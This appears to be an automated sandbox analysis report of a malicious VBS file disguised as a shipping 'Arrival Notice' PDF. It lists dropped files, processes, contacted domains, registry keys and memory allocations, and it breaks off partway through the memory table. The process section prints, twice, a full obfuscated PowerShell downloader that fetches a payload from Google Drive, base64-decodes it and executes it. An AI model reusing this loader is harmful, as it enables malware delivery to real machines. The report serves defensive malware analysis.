Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Arrival Notice PUS_pdf.vbs
|
ASCII text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
|
Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks,
0x1 compression
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aaqfbwvt.xte.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_el1m15uv.qqi.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jnu3giay.tgb.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_realgte5.3nq.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Australians.Hov
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Arrival Notice PUS_pdf.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Klervske = 1;$Hengivnes='Substrin';$Hengivnes+='g';Function
Banuyo17($Kolonihaves){$Paraglossia=$Kolonihaves.Length-$Klervske;For($Grazer=5; $Grazer -lt $Paraglossia; $Grazer+=(6)){$Fradrage249+=$Kolonihaves.$Hengivnes.Invoke($Grazer,
$Klervske);}$Fradrage249;}function decoupled($Calorically){& ($Sommerperioden) ($Calorically);}$Brodfrs=Banuyo17 'B mbeMstillor,kalzRehoniGematlLacerlMatria
asse/ P.oc5Klods.Sy.sl0Azotu prore( BjerWBuskaiUfejlnLigkad,yclooUdstawRessosStarn Cran,NArbejTKisse Depe1Kv te0Incre.O lys0
Nove; H na pathoWScrobiBndlenLoved6A.skr4Ma.ne;For a PresixOblig6Imper4Uophr;Fejlb KvalirShiitvTinct: Gru 1Carro2Le,kb1Diasy.
Demu0Smi g) skin RumplGEnosteSolitc Fo hkCyma,o Blnd/Paape2H.rsk0 Doze1 ofma0Tasti0Unbad1Distr0Odont1Vag,e TosseFBrohoi Semir,yvsteBrnesf
SkiroVelsexExuld/Bevis1Ujaev2Samos1Exter.Thwac0Sees ';$Stenotaphrum=Banuyo17 'Trbl,UKomplsStatseSmaalr Hj,o-Det,uALovfog
,asteForomn Un ntGreg ';$Amputationer=Banuyo17 'Sederh Ar.dtFremsttredip.luklsGalde: Ansk/Fr.ml/AntiadKvster MandiFripavSati.eG.lio.
SikkgSeb soByto,oMaximgNontelBal ieEinar.SyntacArb.jo ,gebmBalda/InterugonofcOvera?TakeueUvistxKvit,pR,maioindberTranst Pree=CaissdPosteoBowlewCorn,n
SteelUns.loMatera Boncd Besi&O erfiUnburdSynta=Prten1,aghuoPars lMelonGImper4underRSho.t0ExcurHtang,LUntrejAut eL,aben5Astho0Ton.dh
u,viYGodkevMel eD IncruCylinsI.olaEUrtep_DistrSHyperTAfl s-KulbrCScrevKHugorhThermKImperIPadd r Db.f- FrasD.vervRNo,ar ';$Laservid=Banuyo17
'Mili.>.nten ';$Sommerperioden=Banuyo17 'Ga boiFor.seForndxV ars ';$pseudonitrosite = Banuyo17 'Bru,eeCr.chc P.coh.odomo.kuds
Afsni%Sol,eaRe.sepUnderpTruand.icebaSavortSectiaUnder%Hangm\Ene gASkotjuSystesWopudt SprorAllosaIndsklPremiiGigg.a balln forssAmygd.
AlsiHNormtoSt rmvCorka Chond& Sk u& Stan Sp,see Orn,cErhvehmonaroTerep .epu$ Coal ';decoupled (Banuyo17 'Overk$Kkkeng J,gelLivsooUd,tibSleepaphotolBarda:NewsdF
Os.auMultilFe.tud TyphmTamaraKlaveaEllipnForsteParalrOptag=Stran(,torkc,anghmRea tdNerve Skunk/BrrencIndl Langb$UndulpIndh
sPr.oceOrganuhemlidAust oLokalnTerroi ImmatTrombrR.dimoCon,es Lig i McmutdknaveMotor)Inds ');decoupled (Banuyo17 ',rnsk$F,stegSili
lSaksnoPr.blbAghanaBeseelTriak:StaffBD wcooGallftGngerr undey CecelKo,gelEmotii.appedSnakea K ajeU.ret=Uddel$fyrinA,lutmm.osimpFra
auBekentSubdeaCostltIndpoiCholaoSemiwnOpstaeBuffer Unsy.CommissynkrpMaterl PolliFlight Scra( Fusi$Fr igLlnsuma Cir.s MetaeKunstrModerv
OptaibirgidFinge)Bidra ');$Amputationer=$Botryllidae[0];decoupled (Banuyo17 ',lyve$Ek,orgMiswrlTherioPlenubFedtiaLfterlTexti:
temKFiskerIsocyeOvergm ubee Parar KicheDyna tOpspa= SvigNSvin,efibe,w Port-KrakeO urtzbhypopjGa,eke Unvocprfert Bulb sl,ghSDiscoy
errasShanktErhere Ma gmSmert.DubioNHaworePrototSliv.. rojWFeneseKv,enb ,uriCMyreulStudei PrsteBssemnBogomtBeby ');decoupled
(Banuyo17 'Arbej$JenirKStjerrbegiteBarsemHaandeudsidrMrke.e Fordtjunki.lensaHNovemeDiakoaSam ndDrawbepub.ir BrdssTreet[Hyper$AnspoS
offetRemineStil,nFrilsoBolt tForlaaGrounp Pse,hopregr ExhauCubi.m ,occ]Under=Udkla$Uds.yBChinkr EpidoBear.d S.nufRaffir,recas
Info ');$Dandy=Banuyo17 'CalvrKFremtrDaab,eDri,hm agneegtefor AcqueTusintro,an. A,icD UdsaospektwUlt,an VelolMo,dno,oniraFlattd
ReasFMlke.iKlarhlSelv eDelag(Sero,$ BysbAIncogm SprupVaskeuFodertRets ablacktUreosiCholuoStepdnIlyapeUnbl,rHuara,Quaif$ ngrasNautieCuratmjuvaviReminp
Ne,brBenedoSprjtv ,ermeUnsynn Ulis) .ope ';$Dandy=$Fuldmaaner[1]+$Dandy;$semiproven=$Fuldmaaner[0];decoupled (Banuyo17 'almo,$BrevagneighlSpa
robruntbLithoaRegralPulld:BureaUUnsymnundoudAf ameProgrrDemeas UnretForb.eKo,temStatsm D.rge TilsnFabri=Natur(.itioTPrei,eBricks
Vi etMolek-DespoPso,edaHeatithofteh Lido Guess$Ph llsUnchre AssomGenneiGer.ipcrimsrSt,ngo Vaa,vtrreheStor,nhavne)Overe ');while
(!$Understemmen) {decoupled (Banuyo17 'Tilgo$svigeg starl sko o EvadbArariaAgurkl rets:tri oNclo.pa Twirs Sm,dtRegioiSprogeEnergs.orgatMistr=Indef$StenttReklarDialeuCherueBh
is ') ;decoupled $Dandy;decoupled (Banuyo17 'T,gseSMeto.tHyperaPre.erFrisktC,alm-MacroSS,inelBesseeGuth,eUnfurpTaler My.l4Phase
');decoupled (Banuyo17 ' Card$Unsipgprdikl I.peo T,efb binaaH.sdel le s: GlasUSweetnOnerodO erheFjendrReprosProvetPalpaeAlit.mM.stim
u.ele.deelnLeven= Hj f(InestTProgreUdenos FrsttTilsl- C ilPWraina Pod tSvipthRoere s bcy$M.untsOesopeBombamRubini OutdpImpolrSb,booRhiz.vMalere
R conArkad)Liban ') ;decoupled (Banuyo17 'Coun $Bruttg.ommel ,ardo Ess,bIagttaCelebl Domi:DiamoTdithirTineauIndklgD koleEghj,nMatriePommesOitic=Semi.$Acce,gGarrolBo,dhoCalmsbFunktaW,llilAmimi:
Ls,iSAkup aKonkumOverls,yttesD.kup+ Fina+darwi%Sooge$EyingBCheboo MemotInb orInd ey Wedgl Fa.il Lu.ti IncidP,ecea ConfeTrihy.SkrigcMesitoAf,enu
PagonStutftBevel ') ;$Amputationer=$Botryllidae[$Trugenes];}decoupled (Banuyo17 'Compu$Multig .ydalPremioNinjab scataKuglelP
rfe:Pew.nNAngreaMezenz ImpeaDaah r,apani IlsetUnemai AporsRe tomTappi Cell =Cykel RegleGE,igoeFor.ut Rev.-MattiCManu oRottinunh,ct
IdioeindusnBinaetResyn ,akul$Kontasend.ge Vil.m Sal.iKautipFialer KonfoAm.unvBolsteBagsdn Whi, ');decoupled (Banuyo17 'Milit$DdssygDjthalRgelsoDualmbS.arcaAuxollBroch:SlgtnViteruvT
nfoeoverctBellas G ab Haver=Forh, Udbri[UndslSChittyteksts P.eatKogekeNo.com Tids.SquamCBr,ndoExternStatevNordseM,ssirEjendt
Auto]No me:Lumba:SorbuF GstfrCaly.oFortrmNavneBKdfula Unbrs OutgeOo,on6 ate4 PhreSSmu,st MoldrKloakiAlimenSavarg Uroc(Svovl$
BracNI fikaPacanz ubea T anrdildeiAffectB,odaiJ,rvis UsikmGets.)Fejld ');decoupled (Banuyo17 'Passa$ B,angHaimal elfloUdradbJessea
EngolVirus:HemauOUdenovPettiePleskr Synss,fterl RetraWind,cDatalk rosk Stri.= Te,o Supra[LsengS.icroy ubves to.atSletheOrchimFestl.
SpisThuskeei.fanxBolewtS,ovf.UncivEOvertnRewe,cFaktooStatsdAttesi GlipnShawngTppef] C,bm:P.ede: aturASunstS gin,C dereI T.skICarth.MisauG
RodeeUpshotHuskaSGroott.illirEuromiImpisnhennegHal,p(Fortr$ P,liV PorcvbaryleLydset Vests Grun)Metab ');decoupled (Banuyo17
'Syvaa$ PrudgacronlSurinoDigambImp ga irkelAgate:BendaBLo.giuR,erlr MitinSammefUnrusiBerggrSupereNonem=Nymph$FirblO Bes,vFork,eLums.r
TiewsinduslR wina.nmelcStempk her .ume.dsFryt,u astb V,rms F,retLmb.rrSkamfi umbonAs,ongParei(Ic nh3Bl,dp0toptr5Fil.p7Priva0Folke6Linie,Painf2kalib9Fleet9Super6C,rom1Dinne)Tack.
');decoupled $Burnfire;"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Klervske = 1;$Hengivnes='Substrin';$Hengivnes+='g';Function
Banuyo17($Kolonihaves){$Paraglossia=$Kolonihaves.Length-$Klervske;For($Grazer=5; $Grazer -lt $Paraglossia; $Grazer+=(6)){$Fradrage249+=$Kolonihaves.$Hengivnes.Invoke($Grazer,
$Klervske);}$Fradrage249;}function decoupled($Calorically){& ($Sommerperioden) ($Calorically);}$Brodfrs=Banuyo17 'B mbeMstillor,kalzRehoniGematlLacerlMatria
asse/ P.oc5Klods.Sy.sl0Azotu prore( BjerWBuskaiUfejlnLigkad,yclooUdstawRessosStarn Cran,NArbejTKisse Depe1Kv te0Incre.O lys0
Nove; H na pathoWScrobiBndlenLoved6A.skr4Ma.ne;For a PresixOblig6Imper4Uophr;Fejlb KvalirShiitvTinct: Gru 1Carro2Le,kb1Diasy.
Demu0Smi g) skin RumplGEnosteSolitc Fo hkCyma,o Blnd/Paape2H.rsk0 Doze1 ofma0Tasti0Unbad1Distr0Odont1Vag,e TosseFBrohoi Semir,yvsteBrnesf
SkiroVelsexExuld/Bevis1Ujaev2Samos1Exter.Thwac0Sees ';$Stenotaphrum=Banuyo17 'Trbl,UKomplsStatseSmaalr Hj,o-Det,uALovfog
,asteForomn Un ntGreg ';$Amputationer=Banuyo17 'Sederh Ar.dtFremsttredip.luklsGalde: Ansk/Fr.ml/AntiadKvster MandiFripavSati.eG.lio.
SikkgSeb soByto,oMaximgNontelBal ieEinar.SyntacArb.jo ,gebmBalda/InterugonofcOvera?TakeueUvistxKvit,pR,maioindberTranst Pree=CaissdPosteoBowlewCorn,n
SteelUns.loMatera Boncd Besi&O erfiUnburdSynta=Prten1,aghuoPars lMelonGImper4underRSho.t0ExcurHtang,LUntrejAut eL,aben5Astho0Ton.dh
u,viYGodkevMel eD IncruCylinsI.olaEUrtep_DistrSHyperTAfl s-KulbrCScrevKHugorhThermKImperIPadd r Db.f- FrasD.vervRNo,ar ';$Laservid=Banuyo17
'Mili.>.nten ';$Sommerperioden=Banuyo17 'Ga boiFor.seForndxV ars ';$pseudonitrosite = Banuyo17 'Bru,eeCr.chc P.coh.odomo.kuds
Afsni%Sol,eaRe.sepUnderpTruand.icebaSavortSectiaUnder%Hangm\Ene gASkotjuSystesWopudt SprorAllosaIndsklPremiiGigg.a balln forssAmygd.
AlsiHNormtoSt rmvCorka Chond& Sk u& Stan Sp,see Orn,cErhvehmonaroTerep .epu$ Coal ';decoupled (Banuyo17 'Overk$Kkkeng J,gelLivsooUd,tibSleepaphotolBarda:NewsdF
Os.auMultilFe.tud TyphmTamaraKlaveaEllipnForsteParalrOptag=Stran(,torkc,anghmRea tdNerve Skunk/BrrencIndl Langb$UndulpIndh
sPr.oceOrganuhemlidAust oLokalnTerroi ImmatTrombrR.dimoCon,es Lig i McmutdknaveMotor)Inds ');decoupled (Banuyo17 ',rnsk$F,stegSili
lSaksnoPr.blbAghanaBeseelTriak:StaffBD wcooGallftGngerr undey CecelKo,gelEmotii.appedSnakea K ajeU.ret=Uddel$fyrinA,lutmm.osimpFra
auBekentSubdeaCostltIndpoiCholaoSemiwnOpstaeBuffer Unsy.CommissynkrpMaterl PolliFlight Scra( Fusi$Fr igLlnsuma Cir.s MetaeKunstrModerv
OptaibirgidFinge)Bidra ');$Amputationer=$Botryllidae[0];decoupled (Banuyo17 ',lyve$Ek,orgMiswrlTherioPlenubFedtiaLfterlTexti:
temKFiskerIsocyeOvergm ubee Parar KicheDyna tOpspa= SvigNSvin,efibe,w Port-KrakeO urtzbhypopjGa,eke Unvocprfert Bulb sl,ghSDiscoy
errasShanktErhere Ma gmSmert.DubioNHaworePrototSliv.. rojWFeneseKv,enb ,uriCMyreulStudei PrsteBssemnBogomtBeby ');decoupled
(Banuyo17 'Arbej$JenirKStjerrbegiteBarsemHaandeudsidrMrke.e Fordtjunki.lensaHNovemeDiakoaSam ndDrawbepub.ir BrdssTreet[Hyper$AnspoS
offetRemineStil,nFrilsoBolt tForlaaGrounp Pse,hopregr ExhauCubi.m ,occ]Under=Udkla$Uds.yBChinkr EpidoBear.d S.nufRaffir,recas
Info ');$Dandy=Banuyo17 'CalvrKFremtrDaab,eDri,hm agneegtefor AcqueTusintro,an. A,icD UdsaospektwUlt,an VelolMo,dno,oniraFlattd
ReasFMlke.iKlarhlSelv eDelag(Sero,$ BysbAIncogm SprupVaskeuFodertRets ablacktUreosiCholuoStepdnIlyapeUnbl,rHuara,Quaif$ ngrasNautieCuratmjuvaviReminp
Ne,brBenedoSprjtv ,ermeUnsynn Ulis) .ope ';$Dandy=$Fuldmaaner[1]+$Dandy;$semiproven=$Fuldmaaner[0];decoupled (Banuyo17 'almo,$BrevagneighlSpa
robruntbLithoaRegralPulld:BureaUUnsymnundoudAf ameProgrrDemeas UnretForb.eKo,temStatsm D.rge TilsnFabri=Natur(.itioTPrei,eBricks
Vi etMolek-DespoPso,edaHeatithofteh Lido Guess$Ph llsUnchre AssomGenneiGer.ipcrimsrSt,ngo Vaa,vtrreheStor,nhavne)Overe ');while
(!$Understemmen) {decoupled (Banuyo17 'Tilgo$svigeg starl sko o EvadbArariaAgurkl rets:tri oNclo.pa Twirs Sm,dtRegioiSprogeEnergs.orgatMistr=Indef$StenttReklarDialeuCherueBh
is ') ;decoupled $Dandy;decoupled (Banuyo17 'T,gseSMeto.tHyperaPre.erFrisktC,alm-MacroSS,inelBesseeGuth,eUnfurpTaler My.l4Phase
');decoupled (Banuyo17 ' Card$Unsipgprdikl I.peo T,efb binaaH.sdel le s: GlasUSweetnOnerodO erheFjendrReprosProvetPalpaeAlit.mM.stim
u.ele.deelnLeven= Hj f(InestTProgreUdenos FrsttTilsl- C ilPWraina Pod tSvipthRoere s bcy$M.untsOesopeBombamRubini OutdpImpolrSb,booRhiz.vMalere
R conArkad)Liban ') ;decoupled (Banuyo17 'Coun $Bruttg.ommel ,ardo Ess,bIagttaCelebl Domi:DiamoTdithirTineauIndklgD koleEghj,nMatriePommesOitic=Semi.$Acce,gGarrolBo,dhoCalmsbFunktaW,llilAmimi:
Ls,iSAkup aKonkumOverls,yttesD.kup+ Fina+darwi%Sooge$EyingBCheboo MemotInb orInd ey Wedgl Fa.il Lu.ti IncidP,ecea ConfeTrihy.SkrigcMesitoAf,enu
PagonStutftBevel ') ;$Amputationer=$Botryllidae[$Trugenes];}decoupled (Banuyo17 'Compu$Multig .ydalPremioNinjab scataKuglelP
rfe:Pew.nNAngreaMezenz ImpeaDaah r,apani IlsetUnemai AporsRe tomTappi Cell =Cykel RegleGE,igoeFor.ut Rev.-MattiCManu oRottinunh,ct
IdioeindusnBinaetResyn ,akul$Kontasend.ge Vil.m Sal.iKautipFialer KonfoAm.unvBolsteBagsdn Whi, ');decoupled (Banuyo17 'Milit$DdssygDjthalRgelsoDualmbS.arcaAuxollBroch:SlgtnViteruvT
nfoeoverctBellas G ab Haver=Forh, Udbri[UndslSChittyteksts P.eatKogekeNo.com Tids.SquamCBr,ndoExternStatevNordseM,ssirEjendt
Auto]No me:Lumba:SorbuF GstfrCaly.oFortrmNavneBKdfula Unbrs OutgeOo,on6 ate4 PhreSSmu,st MoldrKloakiAlimenSavarg Uroc(Svovl$
BracNI fikaPacanz ubea T anrdildeiAffectB,odaiJ,rvis UsikmGets.)Fejld ');decoupled (Banuyo17 'Passa$ B,angHaimal elfloUdradbJessea
EngolVirus:HemauOUdenovPettiePleskr Synss,fterl RetraWind,cDatalk rosk Stri.= Te,o Supra[LsengS.icroy ubves to.atSletheOrchimFestl.
SpisThuskeei.fanxBolewtS,ovf.UncivEOvertnRewe,cFaktooStatsdAttesi GlipnShawngTppef] C,bm:P.ede: aturASunstS gin,C dereI T.skICarth.MisauG
RodeeUpshotHuskaSGroott.illirEuromiImpisnhennegHal,p(Fortr$ P,liV PorcvbaryleLydset Vests Grun)Metab ');decoupled (Banuyo17
'Syvaa$ PrudgacronlSurinoDigambImp ga irkelAgate:BendaBLo.giuR,erlr MitinSammefUnrusiBerggrSupereNonem=Nymph$FirblO Bes,vFork,eLums.r
TiewsinduslR wina.nmelcStempk her .ume.dsFryt,u astb V,rms F,retLmb.rrSkamfi umbonAs,ongParei(Ic nh3Bl,dp0toptr5Fil.p7Priva0Folke6Linie,Painf2kalib9Fleet9Super6C,rom1Dinne)Tack.
');decoupled $Burnfire;"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Windows\System32\wbem\WmiPrvSE.exe
|
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Australians.Hov && echo $"
|
||
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Australians.Hov && echo $"
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
https://api.ipify.org/
|
104.26.13.205
|
||
|
https://www.google.com
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://drive.usercontent.google.com
|
unknown
|
||
|
http://crl.microsoft
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://drive.googP
|
unknown
|
||
|
https://drive.google.com
|
unknown
|
||
|
https://drive.usercontent.googh
|
unknown
|
||
|
https://drive.usercontent.google.com
|
unknown
|
||
|
http://drive.google.com
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://apis.google.com
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://ip-api.com/line/?fields=hosting
|
208.95.112.1
|
||
|
https://drive.usercontent.google.comhP
|
unknown
|
There are 13 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
mail.myhydropowered.com
|
unknown
|
|
|
|
bg.microsoft.map.fastly.net
|
199.232.210.172
|
||
|
drive.google.com
|
142.251.15.139
|
||
|
drive.usercontent.google.com
|
142.250.105.132
|
||
|
api.ipify.org
|
104.26.13.205
|
||
|
ip-api.com
|
208.95.112.1
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
208.95.112.1
|
ip-api.com
|
United States
|
||
|
142.251.15.139
|
drive.google.com
|
United States
|
||
|
142.250.105.132
|
drive.usercontent.google.com
|
United States
|
||
|
104.26.13.205
|
api.ipify.org
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
|
FileDirectory
|
There are 19 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
4605000
|
remote allocation
|
page execute and read and write
|
|
|
|
25C45000
|
trusted library allocation
|
page read and write
|
|
|
|
8C40000
|
direct allocation
|
page execute and read and write
|
|
|
|
18931660000
|
trusted library allocation
|
page read and write
|
|
|
|
25C6C000
|
trusted library allocation
|
page read and write
|
|
|
|
9585000
|
direct allocation
|
page execute and read and write
|
|
|
|
61C2000
|
trusted library allocation
|
page read and write
|
|
|
|
7380000
|
direct allocation
|
page read and write
|
||
|
558B000
|
trusted library allocation
|
page read and write
|
||
|
AC0000
|
heap
|
page read and write
|
||
|
289B0000
|
trusted library allocation
|
page read and write
|
||
|
171D09AE000
|
heap
|
page read and write
|
||
|
28A10000
|
trusted library allocation
|
page read and write
|
||
|
171D04C2000
|
heap
|
page read and write
|
||
|
7C40000
|
trusted library allocation
|
page read and write
|
||
|
171CE530000
|
remote allocation
|
page read and write
|
||
|
171D0292000
|
heap
|
page read and write
|
||
|
289A0000
|
trusted library allocation
|
page read and write
|
||
|
2ECD000
|
trusted library allocation
|
page execute and read and write
|
||
|
189399B8000
|
heap
|
page read and write
|
||
|
171D027E000
|
heap
|
page read and write
|
||
|
289C0000
|
trusted library allocation
|
page read and write
|
||
|
2EE0000
|
trusted library allocation
|
page read and write
|
||
|
189399FE000
|
heap
|
page read and write
|
||
|
28A20000
|
trusted library allocation
|
page read and write
|
||
|
25C6A000
|
trusted library allocation
|
page read and write
|
||
|
289E0000
|
trusted library allocation
|
page read and write
|
||
|
289F0000
|
trusted library allocation
|
page read and write
|
||
|
289D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7790000
|
heap
|
page read and write
|
||
|
171D036D000
|
heap
|
page read and write
|
||
|
25A7E000
|
stack
|
page read and write
|
||
|
572F000
|
trusted library allocation
|
page read and write
|
||
|
171D022B000
|
heap
|
page read and write
|
||
|
289A0000
|
trusted library allocation
|
page read and write
|
||
|
171D0372000
|
heap
|
page read and write
|
||
|
18921E82000
|
trusted library allocation
|
page read and write
|
||
|
171CE530000
|
remote allocation
|
page read and write
|
||
|
171D02D3000
|
heap
|
page read and write
|
||
|
E585000
|
direct allocation
|
page execute and read and write
|
||
|
171D034F000
|
heap
|
page read and write
|
||
|
7FF886F02000
|
trusted library allocation
|
page read and write
|
||
|
289B0000
|
trusted library allocation
|
page read and write
|
||
|
87D0000
|
trusted library allocation
|
page read and write
|
||
|
189215F1000
|
trusted library allocation
|
page read and write
|
||
|
32B2000
|
heap
|
page read and write
|
||
|
1891FA70000
|
heap
|
page read and write
|
||
|
289CF000
|
trusted library allocation
|
page read and write
|
||
|
33D5000
|
trusted library allocation
|
page execute and read and write
|
||
|
A1E0000
|
direct allocation
|
page read and write
|
||
|
18921280000
|
heap
|
page read and write
|
||
|
171CE3B8000
|
heap
|
page read and write
|
||
|
27BF2000
|
trusted library allocation
|
page read and write
|
||
|
171D0372000
|
heap
|
page read and write
|
||
|
171D0AB6000
|
heap
|
page read and write
|
||
|
28A10000
|
trusted library allocation
|
page read and write
|
||
|
171D0427000
|
heap
|
page read and write
|
||
|
289F0000
|
trusted library allocation
|
page read and write
|
||
|
89B5000
|
heap
|
page read and write
|
||
|
289A0000
|
trusted library allocation
|
page read and write
|
||
|
A240000
|
direct allocation
|
page read and write
|
||
|
27EA2000
|
heap
|
page read and write
|
||
|
65E538E000
|
stack
|
page read and write
|
||
|
25B10000
|
heap
|
page execute and read and write
|
||
|
1891F925000
|
heap
|
page read and write
|
||
|
189233C4000
|
trusted library allocation
|
page read and write
|
||
|
289AD000
|
trusted library allocation
|
page read and write
|
||
|
2FD0000
|
heap
|
page read and write
|
||
|
7360000
|
direct allocation
|
page read and write
|
||
|
7FF886D30000
|
trusted library allocation
|
page read and write
|
||
|
171CE2FF000
|
heap
|
page read and write
|
||
|
289A0000
|
trusted library allocation
|
page read and write
|
||
|
5F39000
|
trusted library allocation
|
page read and write
|
||
|
E13000
|
trusted library allocation
|
page execute and read and write
|
||
|
18921290000
|
trusted library allocation
|
page read and write
|
||
|
171CE550000
|
heap
|
page read and write
|
||
|
18931600000
|
trusted library allocation
|
page read and write
|
||
|
2565C000
|
stack
|
page read and write
|
||
|
7FF887070000
|
trusted library allocation
|
page read and write
|
||
|
27BEE000
|
trusted library allocation
|
page read and write
|
||
|
289A0000
|
